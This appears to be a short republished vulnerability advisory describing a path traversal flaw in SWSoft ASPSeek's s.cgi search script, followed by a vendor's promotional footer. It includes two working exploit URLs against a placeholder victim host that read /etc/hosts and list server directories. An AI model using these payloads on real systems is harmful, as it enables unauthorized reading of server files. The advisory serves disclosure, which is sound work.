SWSoft ASPSeek s.cgi script vulnerability allows file exposure via crafted URLs.
`Hi comrades:
I'dont speak (write) wery good English by this reason a go to pass to
describe the information that I have and I could test about this
vulnerability:
I know some servers whit this bug, I only test it in this type of
servers but should run in others whitout problems.
(Tested in Server: Apache/1.3.9 (Unix) PHP/4.0.3pl1 FrontPage/4.0.4.3)
Name : SWSoft ASPSeek s.cgi script "show files" Vulnerability.
Problem: Adding the string "/../../../../" to an URL allows an
attacker to view any file on the server, and
also list directories within the server.
Exploit:
http://your.victim.gov/cgi-bin/s.cgi?../../../../etc/hosts
http://your.victim.gov/cgi-bin/s.cgi?../../../../etc/
Salud y (A) !!!!
_TacK_ ([email protected])
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo